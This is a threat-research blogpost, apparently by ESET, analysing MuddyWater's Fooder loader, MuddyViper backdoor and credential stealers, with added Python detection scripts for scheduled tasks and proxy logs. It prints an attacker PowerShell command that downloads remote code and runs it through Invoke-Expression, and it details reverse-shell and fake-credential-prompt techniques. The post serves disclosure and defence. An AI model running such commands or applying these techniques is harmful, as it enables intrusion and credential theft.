Wednesday, December 3, 2025

MuddyWater: Snakes by the riverbank


ESET researchers have identified new MuddyWater activity primarily targeting organizations in Israel, with one confirmed target in Egypt. MuddyWater, also known as Mango Sandstorm or TA450, is an Iran-aligned cyberespionage group known for its persistent targeting of government and critical infrastructure sectors, often leveraging custom malware and publicly available tools. In this campaign, the attackers deployed a set of previously undocumented, custom tools with the objective of improving defense evasion and persistence. Among these tools is a custom loader, Fooder, designed to execute MuddyViper, a C/C++ backdoor. Several versions of Fooder masquerade as the classic Snake game, and their internal logic includes a custom delay function inspired by the game's mechanics, combined with frequent use of Sleep API calls. These features are intended to delay execution and hinder automated analysis. MuddyViper allows the attackers to collect system information, execute files and shell commands, transfer files, and exfiltrate Windows login credentials and browser data. The campaign also leverages credential stealers (CE‑Notes and LP‑Notes) and reverse tunneling tools (go‑socks5), long a favorite of MuddyWater operators.

Although this is our first public blogpost covering MuddyWater, ESET researchers have been monitoring the group for several years and have documented its activities in several ESET APT Activity Reports. Unlike earlier MuddyWater campaigns, which were often noisy and easily detected, the one covered in this blogpost demonstrates a more focused, refined, and sophisticated approach.

Key points of this blogpost:

  • MuddyWater developers adopted CNG, the next-generation Windows cryptographic API, which is unique among Iran-aligned groups and somewhat atypical across the broader threat landscape.
  • The group also used more advanced techniques to deploy MuddyViper, a new backdoor, by using a loader (Fooder) that reflectively loads it into memory and executes it.
  • We provide technical analyses of the tools used in this campaign, including MuddyViper, the Fooder loader, the CE-Notes browser-data stealer, the LP-Notes credential stealer, the Blub browser-data stealer, and go‑socks5 reverse tunnels.
  • During this campaign, the operators deliberately avoided hands-on-keyboard interactive sessions, a historically noisy approach often characterized by mistyped commands.

MuddyWater group overview

MuddyWater is a cyberespionage group active since at least 2017, primarily targeting entities in the Middle East and North America. It is one of the most active Iran-aligned APT groups tracked by ESET researchers and has links to Iran's Ministry of Intelligence and Security (MOIS).

The group was first introduced to the public as MuddyWater by Unit 42 in 2017, whose description of the group's activity is consistent with ESET's profiling – a focus on cyberespionage, the use of malicious documents as attachments designed to prompt users to enable macros and bypass security controls, and a primary targeting of entities located in the Middle East.

Notable past activities include Operation Quicksand (2020), a cyberespionage campaign targeting Israeli government entities and telecommunications organizations, which exemplifies the group's evolution from basic phishing tactics to more advanced, multistage operations; and a campaign targeting political groups and organizations in Türkiye, demonstrating the group's geopolitical focus, its ability to adapt social engineering tactics to local contexts, and its reliance on modular malware and flexible C&C infrastructure.

Besides being frequent, MuddyWater operations are often noisy. The group is known for its persistent targeting of government, military, telecommunications, and critical infrastructure sectors, typically using custom malware and publicly available tools to gain access, maintain persistence, and exfiltrate sensitive data. In addition to targeting its archenemy, Israel, the group appears to be targeting countries that maintain, or seek to strengthen, diplomatic ties with Iran.

ESET has documented several campaigns attributed to MuddyWater that highlight the group's evolving toolset and shifting operational focus. While the earlier operations relied on broad targeting and relatively unsophisticated techniques, more recent campaigns show signs of technical refinement and increased precision.

In March and April 2023, MuddyWater targeted an unidentified victim in Saudi Arabia by deploying a batch script that downloaded a PowerShell-based backdoor, which was used to download and execute arbitrary payloads and subsequently to remove the initial payload from disk.

The group conducted a campaign in January and February 2025 that was notable for its operational overlap with Lyceum (an OilRig subgroup), further detailed in this publication. This latest overlap suggests an evolution in MuddyWater's modus operandi.

The group's publicly documented custom tools include, for example, the Bugsleep, Blackout, Small Sieve, Mori, and POWERSTATS backdoors, as well as custom-compiled variants of open-source tools such as LaZagne or CrackMapExec. MuddyWater campaigns typically don't leverage or introduce new tools, malware, or techniques; instead, they are usually noteworthy because of their targeting.

While MuddyWater initially concentrated strictly on cyberespionage, its cooperation with Lyceum led to targeting of the manufacturing sector via spearphishing. The attack generated considerable noise and achieved little in terms of operational objectives.

The campaign outlined in this publication shows what, for MuddyWater, appears to be an unprecedented advancement in toolset and technical execution.

Victimology

As previously mentioned, during this campaign MuddyWater primarily targeted organizations in Israel, but also one in Egypt. Table 1 lists the victims by country and vertical. The campaign started on September 30th, 2024 and concluded on March 18th, 2025.

Table 1. Victims by country and vertical

Country   Vertical
Egypt     Technology
Israel    Engineering #1
          Engineering #2
          Engineering #3
          Local Government #1
          Local Government #2
          Manufacturing
          Technology
          Transportation
          Utilities
          University #1
          University #2
          University #3
          Unidentified #1
          Unidentified #2
          Unidentified #3
          Unidentified #4
          Unidentified #5

One interesting thing to note about the victim in the utilities vertical is that it was also compromised by Lyceum on February 11th, 2025.

Overlap and cooperation with Lyceum

In early 2025, ESET Research identified an operational overlap between MuddyWater and Lyceum, a subgroup of the Iran-aligned OilRig cyberespionage group, also known as HEXANE or Storm-0133. OilRig has been active since at least 2014 and is generally believed to be based in Iran. Tools that we attribute to Lyceum include DanBot, Shark, Milan, Marlin, Solar, Mango, OilForceGTX, and a variety of downloaders that leverage legitimate cloud services for C&C communication. We have previously observed Lyceum targeting several Israeli organizations, including national and local governmental entities, as well as organizations in the healthcare sector.

During the campaign covered here, MuddyWater conducted a joint sub-campaign with OilRig in January and February 2025. MuddyWater initiated access via a spearphishing email containing a link to an installer for the Syncro remote monitoring and management (RMM) software. Following the initial compromise, the attackers installed an additional RMM tool, PDQ, and deployed a custom Mimikatz loader disguised as certificate files with .txt file extensions. Based on the observed activity, the harvested credentials were most likely used by Lyceum to gain access and assume control of operations within the targeted manufacturing-sector organization in Israel.

This cooperation suggests that MuddyWater may be acting as an initial access broker for other Iran-aligned groups.

Attribution

The victimology, TTPs, and tooling observed in this campaign align with capabilities and tools that we have previously attributed to MuddyWater. This assessment is based on the initial access methodology and the subsequent delivery of malicious tools – typically via spearphishing emails that contain links to download RMM software.

TTPs

MuddyWater operators continue to rely on predictable, script-based backdoors written in PowerShell and Go. Their targeting remains focused on the telecommunications, governmental, and oil and energy sectors.

Initial access is usually achieved through spearphishing emails, often containing PDF attachments that link to installers for RMM software hosted on free file-sharing platforms such as OneHub, Egnyte, or Mega. These links lead to the download of RMM tools including Atera, Level, PDQ, and SimpleHelp.

Among the tools deployed by MuddyWater operators is also the VAX‑One backdoor, named after the legitimate software it impersonates: Veeam, AnyDesk, Xerox, and the OneDrive updater service.

The group's continued reliance on this familiar playbook makes its activity relatively easy to detect and block.

Tools overlap

Additionally, we identified code overlaps between several of the newly documented tools and those we previously attributed to MuddyWater:

  • LP-Notes, a new credential stealer, has the same design as CE-Notes, a browser-data stealer that we previously associated with MuddyWater. During this campaign, we also observed a Mimikatz loader that shares the same design and obfuscation methods as CE-Notes.
  • We observed several new variants of MuddyWater's customized go‑socks5 reverse tunnels, which the group used throughout 2024 and 2025.
  • In two instances, we observed the customized go‑socks5 reverse tunnels embedded in a new MuddyWater loader, internally named Fooder. In a dozen other cases, this loader was used to load MuddyWater's new backdoor, MuddyViper.
  • Interestingly, MuddyViper and the CE-Notes/LP-Notes/Mimikatz loader variants use the CNG API for data encryption and decryption. To the best of our knowledge, this is unique among Iran-aligned groups. Another trait these tools share is that they attempt to steal user credentials by opening a fake Windows Security dialog.

Toolset

In this blogpost, we document previously unknown, custom tools used by MuddyWater:

  • Fooder loader – a newly identified loader that loads the MuddyViper backdoor into memory and executes it. Note that several versions of Fooder masquerade as the classic Snake game, hence the designation MuddyViper. Another notable characteristic of Fooder is its frequent use of a custom delay function that implements the core logic of the Snake game, combined with Sleep API calls. These features are intended to delay execution in an attempt to hide malicious behavior from automated analysis systems.
  • MuddyViper backdoor – a previously undocumented C/C++ backdoor that allows attackers to collect system information, download and upload files, execute files and shell commands, and steal Windows credentials and browser data.

The rest of the toolset documented in this blogpost includes:

  • CE-Notes, a browser-data stealer,
  • LP-Notes, a credential stealer,
  • Blub, a browser-data stealer, and
  • several go‑socks5 reverse tunnels.

Fooder loader

Fooder is a 64-bit C/C++ loader designed to decrypt and then reflectively load an embedded payload (as illustrated in Figure 1), with MuddyViper being the most frequently observed payload.

Figure 1. Relationships between Fooder and its launcher and payload

Fooder appears to be the internal name of this tool, based on its PDB paths:

  • C:\Users\win\Desktop\Fooder\Debug\Launcher.pdb
  • C:\Users\pc\Desktop\main\My_Project\Fooder\x64\Debug\Launcher.pdb

Although we have only captured one sample of it, we believe that Fooder is executed by a simple launcher application, written in C. It has no string obfuscation, logs verbosely to the console, and has its PDB path left intact:

C:\Users\pc\source\repos\ConsoleApplication7\x64\Release\ConsoleApplication7.pdb

We have observed one instance (SHA-1: 76632910CF67697BF5D7285FAE38BFCF438EC082) of this component launching Fooder. Deployed under the name %USERPROFILE%\Downloads\OsUpdater.exe, the launcher expects a process ID as a command line argument. Once executed, it attempts to duplicate the token of the specified process via the DuplicateTokenEx API, and then uses CreateProcessAsUserA to execute Fooder under that token.

Once executed, Fooder decrypts the embedded payload following these steps:

  • The command line argument (6) is added to each byte of a hardcoded key, which produces the AES decryption key, shared across all samples: 6969697820511281801712341067111416133321394945138510872296106446.
  • A hardcoded value (5) is subtracted from each byte of the hardcoded payload.
  • Finally, the hardcoded payload is decrypted using the WinCrypt API and the AES key.

Fooder then loads the payload directly into memory using reflective techniques, so the payload is never written to disk and never passes through the standard Windows image loader (LoadLibrary).

Once launched this way, Fooder has been used to deliver not only MuddyViper but also HackBrowserData, an open-source utility capable of decrypting and exporting sensitive browser information such as credentials and cookies. Fooder also facilitates the deployment of go‑socks5 variants, which are Go-compiled binaries that function as reverse tunnels, enabling attackers to bypass firewalls and Network Address Translation (NAT). Notably, the MuddyWater group has previously used go‑socks5 independently of Fooder, indicating a continued reliance on this tool for stealthy network communication and data exfiltration.

Note that several versions of Fooder masquerade as the Snake game – see the strings and mutexes highlighted in Figure 2 – hence the name of its most frequently embedded payload, MuddyViper.

Figure 2. Multiple Fooder instances masquerade as the Snake game

Another notable characteristic of Fooder is its frequent use of a custom delay function (which implements the core logic of the Snake game, where the player maneuvers the head of a growing line, usually themed as a snake, to avoid obstacles and collect items) together with Sleep API calls. The delay in execution is achieved by mimicking the game's loop-based timing: as in the Snake game, where each movement is controlled by a loop that waits for a short interval before updating the game state, the loop introduces execution delays that slow down the malware's behavior, helping it evade sandboxes and monitoring tools that look for rapid malicious activity or time out before the payload runs. Figure 3 highlights the delays and the Snake game welcome banner presented to the user at runtime.

Figure 3. Various calls to delay execution are dispersed throughout Fooder's code

Fooder doesn't have any built-in persistence capability. However, in cases where Fooder's final payload is the MuddyViper backdoor, the backdoor can set up persistence for the loader via a scheduled task or the Startup folder.

MuddyViper backdoor

MuddyViper, a previously undocumented backdoor written in C and C++, allows gaining covert access to and control over compromised systems. We have observed MuddyViper only in memory, loaded by Fooder, which may be the reason there is no obfuscation or string encryption. As is typical for MuddyWater, MuddyViper sends extremely verbose and frequent status messages to its C&C server throughout its execution, such as the following:

  • [+] Persist: ——————– Hello,I’m Live ——————–
  • [+] Persist: ——————– Hello,First Time ——————–
  • [-] Persist: failed Create task !!!!

The backdoor also keeps a lengthy list of 150+ process names and details about the respective products so that it can send detailed reports about the security tools detected in the compromised environment, even though adding the details could easily have been implemented on the server side:

  • [>] Process: aciseagent.exe ~~> (Cisco Umbrella Roaming Security) –> (Security DNS) found!
  • [>] Process: acnamagent.exe ~~> (Absolute Persistence) –> (Asset Management) found!
  • [>] Process: acnamlogonagent.exe ~~> (Absolute Persistence) –> (Asset Management) found!

This behavior results in substantial network traffic.

MuddyViper has two methods of establishing persistence:

  • A scheduled task named ManageOnDriveUpdater, which launches MuddyViper from its installation path on each system start.
  • An entry in the Windows Startup folder, which is the only one of the two that the backdoor's uninstall command removes (see command ID 900 in Table 2).

MuddyViper supports 20 backdoor commands – see Table 2 for details of all of them – notably including the ability to open and operate reverse shells; download, upload, and execute files; report the running security tools; steal user credentials and data from a variety of browsers; set up its own persistence; and uninstall itself.

Table 2. MuddyViper backdoor commands (for each command ID: its arguments, the action taken, and the response sent to the C&C server)

ID 200
  Arguments: N/A
  Action: N/A
  Response: 0, via the GET /adad or GET /aq36 request, to obtain a backdoor command.

ID 207
  Arguments: N/A
  Action: Decrypts the embedded HackBrowserData tool and reflectively loads it in a new thread. This open-source tool can steal credentials, history, and other information from web browsers. MuddyViper then compresses the collected data (into a file named CacheDump.zip) and uploads it to the C&C server.
  Response: Collected browser data, via the GET /mq65 request. In case of an error, a custom status message is sent instead.

IDs 300, 301, 302
  Arguments: The command line to execute (ID 300 only); N/A for IDs 301 and 302.
  Action: Launches a reverse shell using the supplied command line (ID 300), C:\windows\system32\cmd.exe (ID 301), or C:\windows\system32\WindowsPowerShell\v1.0\Powershell.exe (ID 302). Then, in a loop, uploads the process output to the C&C server and interprets the server response (see IDs 350-352) until interrupted.
  Response: Process output, via the GET /oi32 request. In case of an error, a custom status message is sent instead.

ID 350
  Arguments: N/A
  Action: Must follow IDs 300-302. Sleeps for a preconfigured amount of time – for the reverse shell loop, the default is one second.

ID 351
  Arguments: Sleep time (in milliseconds)
  Action: Must follow IDs 300-302. Configures the sleep time for the reverse shell loop – the default is one second.

ID 352
  Arguments: Input for the reverse shell
  Action: Must follow IDs 300-302. Passes the supplied argument to the running reverse shell.

ID 360
  Arguments: N/A
  Action: Not implemented, possibly related to the reverse shell API.
  Response: A custom error message: [-] Agent doesn’t have an active pipe

ID 400
  Arguments: Flag
  Action: Must follow ID 401. Confirms that the C&C server has successfully received a part of the exfiltrated local file. Optionally adjusts the sleep before the next upload specified in ID 401 to 10 seconds.
  Response: None, unless this command is issued outside of a pending file upload, in which case a custom error message is sent: [-] Agent doesn’t have an DOWNLOAD file

ID 401
  Arguments: Sleep time (in milliseconds), filename
  Action: Initiates a file upload from the specified local file to the C&C server in chunks, with the specified sleep time between uploads.
  Response: Contents of the specified file, via a sequence of GET /dadw requests.

ID 500
  Arguments: Data chunk
  Action: Must follow ID 501. Writes the received data chunk into a previously created and opened local file.
  Response: A custom error message, if the operation fails.

ID 501
  Arguments: Sleep time (in milliseconds), filename
  Action: Downloads a file from the C&C server in chunks into a local file with the specified name. The specified sleep time is used as a delay after downloading each chunk. Deletes the file if the connection can’t be established after six consecutive attempts.
  Response: A sequence of GET /dadwqa requests, to request the file contents.

ID 700
  Arguments: Sleep time (in milliseconds)
  Action: Configures the sleep time between connection attempts to the specified value (the default is 60 seconds).
  Response: N/A

ID 800
  Arguments: N/A
  Action: Enumerates running processes, looking for selected security tools from an extensive hardcoded list. For each detected process, sends a report populated from that hardcoded table.
  Response: [>] Process: <process name> ~~> (<product>) –> (<category>) found!

ID 805
  Arguments: Timeout (in milliseconds)
  Action: Displays a fake Windows Security dialog (see Figure 4), prompting the user to fill in credentials, which are then exfiltrated to the C&C server. Uses the supplied argument as a timeout for the dialog.
  Response: Collected credentials, via the GET /rq13 request: [+] creds ~~> Username: <username> ~~> Password: <password>. If not successful, a custom error message is sent instead.

ID 806
  Arguments: N/A
  Action: Sets up persistence via a scheduled task named ManageOnDriveUpdater. The backdoor copies itself to its installation path, unless it is already running from there.
  Response: A custom status message, depending on the outcome of the operation.

ID 900
  Arguments: N/A
  Action: Uninstalls itself. First clears the persistence set via the Windows Startup folder and then deletes itself. Note that this action does not clear the scheduled-task persistence that can be set by command ID 806.
  Response: A custom status message, depending on the outcome of the operation.

ID 905
  Arguments: N/A
  Action: Terminates the current backdoor process.
  Response: N/A

ID 906
  Arguments: N/A
  Action: Relaunches itself (via the CreateProcessW API) and terminates the current process.
  Response: A custom status message, depending on the outcome of the operation.

Other
  Arguments: N/A
  Action: N/A
  Response: [-] Agent statusCode I don’t have it

One of the commands listed in Table 2, ID 805, displays a fake Windows Security dialog in an attempt to trick the victim into filling in their Windows credentials, as seen in Figure 4. A similar technique is used by MuddyWater's LP-Notes stealer (see LP-Notes credential stealer).

Figure 4. Fake Windows Security dialog displayed by MuddyViper (command ID 805)

Another command, ID 900, aims to remove MuddyViper from the compromised machine and clear its persistence; however, the command does not remove all traces of the backdoor, because the ManageOnDriveUpdater scheduled task is left in place. For responders this means that a host where the operators "cleaned up" can still carry the task, so it is worth hunting for independently of the binary.
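The point above, that the uninstall command leaves the scheduled task behind, is the kind of residue a responder can hunt for in task exports. The following is an added example, not ESET's or MuddyWater's code: it splits the concatenated output of `schtasks /query /xml` into per-task documents and flags the ManageOnDriveUpdater task by name, as well as any boot- or logon-triggered task whose action runs from a user-writable directory. The two task documents are constructed for this example, and the executable path in the suspicious one (C:\Users\Public\Downloads\OsUpdater.exe) is a hypothetical placeholder, since the blogpost does not reproduce the task's launch path; the list of user-writable directories is an assumption to be extended for your environment.

```python
"""Hunt exported Windows scheduled-task XML for MuddyViper-style persistence.

Added example, not the blogpost's or the malware author's code. The sample XML
below is constructed; the exec path in it is a hypothetical placeholder.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Task name registered by MuddyViper command 806 (from the blogpost).
KNOWN_TASK_NAMES = {"manageondriveupdater"}
# Triggers that fire with no user interaction.
AUTORUN_TRIGGERS = {"BootTrigger", "LogonTrigger"}
# Directory fragments an unprivileged user can write to (assumption: a starting list).
USER_WRITABLE = ("\\users\\public\\", "\\downloads\\", "\\appdata\\", "\\programdata\\", "\\temp\\")


def _text(elem, path):
    node = elem.find(path, NS)
    return (node.text or "").strip() if node is not None else ""


def assess_task(task_xml):
    """Return a verdict for one exported task (e.g. `schtasks /query /tn NAME /xml`)."""
    root = ET.fromstring(task_xml)
    name = _text(root, "t:RegistrationInfo/t:URI").lstrip("\\")
    command = _text(root, "t:Actions/t:Exec/t:Command")
    trig = root.find("t:Triggers", NS)
    triggers = [] if trig is None else [c.tag.split("}")[-1] for c in trig]
    reasons = []
    if name.split("\\")[-1].lower() in KNOWN_TASK_NAMES:
        reasons.append("task name matches MuddyViper persistence task (command 806)")
    if AUTORUN_TRIGGERS.intersection(triggers) and any(p in command.lower() for p in USER_WRITABLE):
        reasons.append("boot/logon-triggered task runs from a user-writable path: " + command)
    return {"name": name, "command": command, "triggers": triggers,
            "reasons": reasons, "suspicious": bool(reasons)}


def iter_task_documents(dump):
    """Split `schtasks /query /xml` output (one XML document per task, each preceded
    by a `<!-- \\Task\\Path -->` comment) into parseable single-task strings."""
    for chunk in re.split(r"(?=<\?xml)", dump):
        chunk = re.sub(r"<\?xml[^>]*\?>", "", chunk)            # per-task declaration
        chunk = re.sub(r"<!--.*?-->", "", chunk, flags=re.S)   # task-path comment
        if chunk.strip():
            yield chunk.strip()


def hunt(dump):
    """All suspicious tasks in a schtasks XML dump."""
    return [v for v in (assess_task(doc) for doc in iter_task_documents(dump)) if v["suspicious"]]


# Constructed dump: one benign Microsoft task and one MuddyViper-style task.
SAMPLE_DUMP = """\
<!-- \\Microsoft\\Windows\\Defrag\\ScheduledDefrag -->
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T01:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>%windir%\\system32\\defrag.exe</Command><Arguments>-c</Arguments></Exec></Actions>
</Task>
<!-- \\ManageOnDriveUpdater -->
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\ManageOnDriveUpdater</URI></RegistrationInfo>
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\\Users\\Public\\Downloads\\OsUpdater.exe</Command></Exec></Actions>
</Task>
"""

if __name__ == "__main__":
    for verdict in hunt(SAMPLE_DUMP):
        print(verdict["name"], "->", verdict["command"])
        for reason in verdict["reasons"]:
            print("   ", reason)
```

On a live host, feed the function the output of `schtasks /query /xml` (or the XML from `Export-ScheduledTask`); the name check catches this campaign's task, while the trigger-plus-path check also catches a renamed copy of the same persistence pattern.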

Network protocol

To communicate with its C&C server, MuddyViper uses HTTP GET requests (via the WinHTTP API) over port 443, with the WINHTTP_FLAG_SECURE flag set so that the connection uses TLS. Two C&C servers have been observed: processplanet[.]org and 35.175.224[.]64.

Both directions of communication AES-CBC encrypt the data using the CNG API, with the key (used across samples) 0608101047106453101617106423101013101012101083109710108585106969 and a zero IV. Since the key and IV are static, the same plaintext always produces the same ciphertext, which makes the encrypted beacons themselves a usable network signature.

In the backdoor → server direction of the communications:

  • Each endpoint URI supported by the C&C server is used by the backdoor for a specific type of request, such as requesting a command, uploading a file, or sending a custom status message.
  • Additional data for the C&C server is included in the HTTP request body, which is unconventional for HTTP GET requests.
  • The User-Agent string is A WinHTTP Example Program/1.0, a remnant of the example code for the WinHttpOpen API.
  • The connection, send, receive, and response timeouts are set to 30 seconds.
  • The default sleep time between consecutive connection attempts is 60 seconds. This value can be configured by command ID 700.
  • Upon failure, connection attempts are retried up to 10 times.
  • Prior to encryption, the data is always formatted as /*.

In the server → backdoor direction of the communications:

  • The HTTP status code determines the backdoor command ID.
  • The backdoor command arguments are included in the HTTP response body.
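The traits above (the sample-code User-Agent, GET requests with a body, the fixed set of endpoint URIs, the known C&C hosts, and command IDs carried as non-standard HTTP status codes) combine into a simple proxy-log detection. The following is an added example, not ESET's or MuddyWater's code: it scores constructed proxy log lines against those traits, alerts only when at least two of them coincide (a lone /adad path on some CDN is not evidence), and interprets a C&C response the way the backdoor does, mapping the status code to the command in Table 2. The log format (space-separated fields with req_len= and ua=) is an assumption; adapt LOG_RE to your proxy's export. The response body on the wire is AES-CBC ciphertext, so the decoder takes the already-decrypted text.

```python
"""Score proxy log lines for MuddyViper C&C traits and decode the command channel.

Added example, not the blogpost's or the malware author's code. The log lines
and their format are constructed for this example.
"""
import re
from http import HTTPStatus

MUDDYVIPER_UA = "A WinHTTP Example Program/1.0"    # leftover from the WinHttpOpen sample code
KNOWN_C2 = {"processplanet.org", "35.175.224.64"}   # C&C hosts named in the blogpost
MUDDYVIPER_URIS = {
    "/adad": "command poll",
    "/aq36": "command poll",
    "/mq65": "browser data upload (command 207)",
    "/oi32": "reverse shell output (commands 300-302)",
    "/dadw": "file upload chunk (command 401)",
    "/dadwqa": "file download request (command 501)",
    "/rq13": "harvested credentials (command 805)",
}
# Server -> backdoor: the HTTP status code of the response is the command ID (Table 2).
COMMANDS = {
    200: "poll / no command", 207: "steal browser data", 300: "reverse shell (supplied command line)",
    301: "reverse shell (cmd.exe)", 302: "reverse shell (powershell.exe)",
    350: "sleep in shell loop", 351: "set shell loop sleep", 352: "shell input",
    360: "not implemented", 400: "acknowledge upload chunk", 401: "upload file",
    500: "download chunk", 501: "download file", 700: "set reconnect sleep",
    800: "enumerate security tools", 805: "fake Windows Security prompt",
    806: "persist via scheduled task", 900: "uninstall", 905: "exit", 906: "relaunch",
}
REGISTERED_STATUSES = {int(s) for s in HTTPStatus}

# Assumed export format: <ts> <src_ip> <method> <url> <status> req_len=<n> ua="<ua>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) "
    r"https?://(?P<host>[^/\s:]+)(?::\d+)?(?P<path>/[^\s?]*)\S* "
    r'(?P<status>\d{3}) req_len=(?P<req_len>\d+) ua="(?P<ua>[^"]*)"$'
)


def score_request(line):
    """Return the MuddyViper traits matched by one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    status = int(m["status"])
    reasons = []
    if m["ua"] == MUDDYVIPER_UA:
        reasons.append("User-Agent is the WinHttpOpen sample string")
    if m["method"] == "GET" and int(m["req_len"]) > 0:
        reasons.append("GET request carries a %s-byte body" % m["req_len"])
    if m["path"] in MUDDYVIPER_URIS:
        reasons.append("MuddyViper URI %s (%s)" % (m["path"], MUDDYVIPER_URIS[m["path"]]))
    if status not in REGISTERED_STATUSES:
        reasons.append("unregistered HTTP status %d used as a command ID" % status)
    if m["host"] in KNOWN_C2:
        reasons.append("destination is a known MuddyViper C&C host")
    # One trait alone is weak evidence; alert when two or more coincide.
    return {"src": m["src"], "host": m["host"], "path": m["path"], "status": status,
            "reasons": reasons, "suspicious": len(reasons) >= 2}


def scan(lines):
    """Alert on the lines that combine at least two MuddyViper traits."""
    return [r for r in map(score_request, lines) if r is not None and r["suspicious"]]


def decode_server_response(status, decrypted_body):
    """Interpret a C&C response as the backdoor does: the status code selects the
    command, the (decrypted) body carries its arguments. Unknown codes make the
    agent answer with its fixed 'statusCode' status message."""
    name = COMMANDS.get(status)
    reply = None if name else "[-] Agent statusCode I don't have it"
    return {"command_id": status, "command": name, "arguments": decrypted_body, "agent_reply": reply}


# Constructed log: normal browsing, three MuddyViper beacons, an API upload,
# and a CDN fetch whose path merely happens to be /adad.
SAMPLE_LOG = """\
2025-01-14T09:00:01Z 10.0.0.15 GET https://www.example.com/index.html 200 req_len=0 ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2025-01-14T09:00:07Z 10.0.0.23 GET https://processplanet.org/adad 200 req_len=48 ua="A WinHTTP Example Program/1.0"
2025-01-14T09:00:08Z 10.0.0.23 GET https://processplanet.org/aq36 805 req_len=48 ua="A WinHTTP Example Program/1.0"
2025-01-14T09:01:08Z 10.0.0.23 GET https://35.175.224.64/rq13 200 req_len=112 ua="A WinHTTP Example Program/1.0"
2025-01-14T09:02:30Z 10.0.0.31 POST https://api.example.net/v1/upload 201 req_len=4096 ua="curl/8.4.0"
2025-01-14T09:03:00Z 10.0.0.42 GET https://cdn.example.org/adad 200 req_len=0 ua="Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("%s -> %s%s [%d]: %s" % (hit["src"], hit["host"], hit["path"], hit["status"],
                                        "; ".join(hit["reasons"])))
    print(decode_server_response(805, "5000"))
```

The status-code check is the most durable of the five: the agent's own error string for unknown codes ([-] Agent statusCode I don't have it) shows that the operators can add commands freely, but a TLS-inspecting proxy that logs a response code such as 805 or 906 on a GET has already seen something no standard web server emits.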

CE-Notes browser-data stealer

CE-Notes is a browser-data stealer that we named after the filename – ce-notes.txt – used to stage stolen data on disk. We discovered CE-Notes in 2024 when we observed MuddyWater deploying EXE and DLL versions of it on the system of an organization in Israel.

CE-Notes was downloaded with the following PowerShell command:

"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" (Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149[.]51:443/57576?filter_relational_operator_2=60169).content | Invoke-Expression

Both versions of the browser-data stealer attempt to steal and decrypt the app-bound encryption key stored in the Local State file (for Chrome, %LOCALAPPDATA%\Google\Chrome\User Data\Local State) of Chromium browsers (Chrome, Brave, and Edge). App-bound encryption was introduced in Chrome version 127 and ties the key that protects cookies and passwords to the identity of the browser process, so that a plain user-context DPAPI call is no longer enough to recover it. Cybercriminals and APT groups have caught on and are actively trying to work around app-bound encryption to steal session keys. CE-Notes is quite similar to ChromElevator on GitHub.

The collected data is AES-CBC encrypted using the CNG API with the key 9262A37DF166AC1D5F582AAC79F54CCB47623BFD9BA001228D284AE13A08F52F and the IV 4103A09887B82FFD56A93BB431805224.

The encrypted data is then stored on disk in C:\Users\Public\Downloads\ce-notes.txt for later retrieval (probably via an RMM tool, since neither the EXE nor the DLL version has any means of exfiltrating the file). The primary difference between the EXE and the DLL is the virtual machine evasion functionality added to the DLL.

We observed the CE-Notes browser-data stealer in the following locations:

  • C:\system2.dll
  • C:\Users\Public\Downloads\system2.dll
  • C:\Intel\system.dll
  • C:\20240926_165509.exe

LP-Notes credential stealer

LP-Notes is a C/C++ Windows credential stealer with the same design as the CE-Notes browser-data stealer. Following the same naming convention as for CE-Notes, we named the stealer LP-Notes based on the local file it uses to stage stolen credentials before exfiltration: C:\Users\Public\Downloads\lp-notes.txt (vs. C:\Users\Public\Downloads\ce-notes.txt). The sole purpose of LP-Notes is to trick victims into submitting their credentials by displaying a fake Windows Security dialog, prompting them to enter their Windows username and password. We have observed an instance of LP-Notes being downloaded and executed by PowerShell with a command line very similar to the one shown in the CE-Notes section.

Initialization

On execution, LP-Notes begins by looking for a process named taskhostw.exe (Host Process for Windows Tasks) and then impersonating that process's security context (via the ImpersonateLoggedOnUser API); only then does LP-Notes activate its malicious payload.

LP-Notes employs several simple obfuscation techniques, including a custom, addition-based routine for string decryption. Figure 5 shows the function that decrypts strings of lengths ranging from 15 to 19 characters; the decryption key is always the same – a set of predefined constants that are added to or subtracted from each byte of the string. Interestingly, CE-Notes uses the same decryption routine, apart from a different decryption key, as shown in Figure 6.

Figure 5. LP-Notes string decryption routine
Figure 6. CE-Notes string decryption routine, similar to that of LP-Notes

LP-Notes uses string stacking for strings shorter than 15 or longer than 19 characters, including the decryption key, IV, and import names. Finally, to obscure its use of Windows API functions and to make static analysis harder, LP-Notes dynamically resolves the API functions during C runtime startup, before the WinMain function (the standard entry point for a graphical Windows-based application, per Microsoft) executes, thus hiding direct references to the API functions from the pseudocode view (see Figure 7).

Figure 7. LP-Notes WinMain function with obfuscated import names (left) vs. deobfuscated view (right)

Capabilities

In an endless loop, LP-Notes displays a fake Windows Security dialog prompting the victim to enter their Windows username and password, as shown in Figure 8 (via the CredUIPromptForWindowsCredentialsW API). Note that although similar, this is not the same as the fake credential prompt used by MuddyViper (see Figure 4). It immediately verifies the validity of any submitted credentials by attempting to log on as that user (via the CredUnPackAuthenticationBufferW and LogonUserW APIs), so only credentials that actually work are kept; the loop also means a victim who cancels or mistypes is simply prompted again.

Figure 8. A fake Windows Security dialog displayed by LP-Notes

If successful, the harvested credentials are AES-CBC encrypted using the CNG API with the key ED15C8344B45DAED1E0578F8BC1A32411812C61F4CB45D89B107287DE0E09FFC and the IV 91A4E6F6D51DAEE773A8F00279792578.

